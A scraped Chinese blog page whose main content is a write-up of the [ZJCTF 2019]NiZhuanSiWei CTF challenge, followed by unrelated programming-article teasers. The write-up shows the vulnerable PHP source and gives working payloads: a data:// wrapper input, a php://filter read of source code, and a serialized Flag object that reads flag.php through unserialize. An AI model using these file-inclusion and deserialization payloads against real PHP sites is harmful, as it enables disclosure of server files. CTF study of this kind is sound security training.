当前位置：首页 > news >正文

[ZJCTF 2019]NiZhuanSiWei - 伪协议+文件包含+反序列化

news 2026/4/1 18:42:45

[ZJCTF 2019]NiZhuanSiWei

1 解题流程
- 1.1 分析
- 1.2 解题

题目源码：

 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";if(preg_match("/flag/",$file)){echo "Not now!";exit(); }else{include($file);  //useless.php$password = unserialize($password);echo $password;}
}
else{highlight_file(__FILE__);
}
?>

1 解题流程

1.1 分析

1、get传text、file、password参数
2、file_get_contents($text,‘r’)的内容要等于welcome to the zjctf才能继续，我们又不知道哪个文件是这个内容，所以直接data伪协议传文件
3、file值不能包含flag
4、提示我们去包含useless.php（先看源码再包含）
5、password需要传递序列化数据（肯定有类给我们）

1.2 解题

?text=data://text/plain,welcome to the zjctf

?text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php

PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo解码得到：
<?php  class Flag{  //flag.php  public $file;  public function __tostring(){  if(isset($this->file)){  echo file_get_contents($this->file); echo "<br>";return ("U R SO CLOSE !///COME ON PLZ");}  }  }  
?>

flag在flag.php中，我们的目标是toString的file_get_contents
构造pop链

<?php  class Flag{  //flag.php  public $file;  public function __tostring(){  if(isset($this->file)){  echo file_get_contents($this->file); echo "<br>";return ("U R SO CLOSE !///COME ON PLZ");}  }  }  $f = new Flag();$f->file = "flag.php";echo serialize($f);
?>  
得到：O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

payload=?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
注意：此时file需要真正包含useless.php

[ZJCTF 2019]NiZhuanSiWei - 伪协议+文件包含+反序列化

[ZJCTF 2019]NiZhuanSiWei 1 解题流程1.1 分析1.2 解题题目源码： <?php $text $_GET["text"]; $file $_GET["file"]; $password $_GET["password"]; if(isset($text)&&(file_get_contents($text,r)"welcome t…...

编程日记 2023/10/10 6:42:39

如何提升和扩展 PostgreSQL — 从共享缓冲区到内存数据网格

利用共享缓存和操作系统缓存利用 RAM Postgres 是一个基于磁盘的数据库，即使您的整个架构是围绕磁盘访问设计的，利用 RAM 也很重要。如果按照人类规模的延迟来判断，这可以将延迟从几天缩短到几分钟（图 1）。只需看一下…...

编程日记 2023/10/10 6:40:37

Elasticsearch：使用 huggingface 模型的 NLP 文本搜索

本博文使用由 Elastic 博客 title 组成的简单数据集在 Elasticsearch 中实现 NLP 文本搜索。你将为博客文档建立索引，并使用摄取管道生成文本嵌入。通过使用 NLP 模型，你将使用自然语言在博客文档上查询文档。安装 Elasticsearch 及 Kibana 如果你还没…...

编程日记 2023/10/10 6:39:36

论文解析——异构多芯粒神经网络加速器

作者朱郭益, 马胜，张春元, 王波（国防科技大学计算机学院） 摘要随着神经网络技术的快速发展, 出于安全性等方面考虑, 大量边缘计算设备被应用于智能计算领域。首先，设计了可应用于边缘计算的异构多芯粒神经网络加速器其基本结构…...

编程日记 2023/10/10 6:37:34

MyBatisPlus（十六）逻辑删除

说明实际生产中的数据，一般不采用物理删除，而采用逻辑删除，也就是将一条记录的状态改为已删除。逻辑删除，本质上是更新操作。 MyBatis Plus 框架，提供了逻辑删除功能。在配置了逻辑删除后，增删改查和统…...

编程日记 2023/10/10 6:36:33

基于黏菌优化的BP神经网络（分类应用） - 附代码

基于黏菌优化的BP神经网络（分类应用） - 附代码文章目录基于黏菌优化的BP神经网络（分类应用） - 附代码1.鸢尾花iris数据介绍2.数据集整理3.黏菌优化BP神经网络3.1 BP神经网络参数设置3.2 黏菌算法应用 4.测试结果：5.M…...

编程日记 2023/10/10 6:35:32

在c2011 iso文档中，位域与struct、union是一起定义的： Structure and union specifiers Syntaxstruct-or-union-specifier:struct-or-union identifier opt { struct-declaration-list }struct-or-union identifierstruct-or-union:structunionstruct-d…...

编程日记 2023/10/10 6:34:31

3.2.OpenCV技能树--二值图像处理--图像腐蚀与膨胀

文章目录 1.文章内容来源2.图像膨胀处理2.1.图像膨胀原理简介2.2.图像膨胀核心代码2.3.图像膨胀效果展示 3.图像腐蚀处理3.1.图像腐蚀原理简介3.2.图像腐蚀核心代码3.3.图像腐蚀效果展示 4.易错点总结与反思 1.文章内容来源 1.题目来源:https://edu.csdn.net/skill/practice/o…...

编程日记 2023/10/10 6:32:29

基于FPGA的数字时钟系统设计

在FPGA的学习中，数字时钟是一个比较基础的实验案例，通过该实验可以更好的锻炼初学者的框架设计能力以及逻辑思维能力，从而打好坚实的基本功，接下来就开始我们的学习吧！ 1.数码管介绍数码管通俗理解就是将8个LED(包含…...

编程日记 2023/10/10 6:31:27

linux centos Python + Selenium+Chrome自动化测试环境搭建?

在 CentOS 系统上搭建 Python Selenium Chrome 自动化测试环境，需要执行以下步骤： 1、安装 Python CentOS 7 自带的 Python 版本较老，建议使用 EPEL 库或源码安装 Python 3。例如，使用 EPEL 库安装 Python 3： sud…...

编程日记 2023/10/10 6:29:24

mysql面试题20：有哪些合适的分布式主键方案

该文章专注于面试，面试只要回答关键点即可，不需要对框架有非常深入的回答，如果你想应付面试，是足够了，抓住关键点面试官：有哪些合适的分布式主键方案？ UUID：UUID通常是由一个二进制的128位整数表示，可以保证全局的唯一性。在Java中，可以通过UUID类生成一个UUID。例…...

编程日记 2023/10/10 6:28:23

git的基础操作

https://blog.csdn.net/a18307096730/article/details/124586216?spm1001.2014.3001.5502 1：使用场景 SVN，如果服务器里面的东西坏掉了，那么就全线崩盘了。 1:基本配置 git config --global user.name “luka” (自己的名字就行) git co…...

编程日记 2023/10/10 6:27:22

lua 中文字符的判断简介

一般在工作中会遇到中文字符的判断、截断、打码等需求，之前一直没有总结，虽然网上资料也多，今天在这里简单的总结一下。 1 .UTF-8简单描述 UTF-8 是 Unicode 的实现方式之一，其对应关系（编码规则）如下表所…...

编程日记 2023/10/10 6:26:22

SSM-XML整合

SSM-XML整合核心配置文件 maven坐标 <dependencies><dependency><groupId>mysql</groupId><artifactId>mysql-connector-java</artifactId><version>8.0.27</version></dependency><!--数据…...

编程日记 2023/10/10 6:24:19

线性代数小例子

这样做有什么问题呢： A 2 A > A ( A − E ) 0 > A E A 0 A^2 A > A(A - E) 0> A E \quad A 0 A2A>A(A−E)0>AEA0 上述做法是错误的，这是因为两个矩阵的乘积结果为0，并不能说明这两个矩阵就是0，即上述…...

编程日记 2023/10/10 6:23:18

ASP.NET Core 开发 Web API

2. Web Api 的创建与Http类型的介绍 2.1 ASP.Net Core Web API项目的创建 1.创建ASP.NET Core Web API项目从“文件”菜单中选择“新建”“项目”。在搜索框中输入“Web API”。选择“ASP.NET Core Web API”模板，然后选择“下一步”。在“配置新项目”对话框中…...

编程日记 2023/10/10 6:21:15

QImage函数setAlphaChannel

最近使用QImage的函数setAlphaChannel时遇到了一个坑，花了不少时间才弄清楚：在使用这个函数后，图像格式都会变成QImage::Format_ARGB32_Premultiplied。先看下setAlphaChannel在帮助文档的说明： void QImage::setAlphaChannel(…...

编程日记 2023/10/10 6:20:14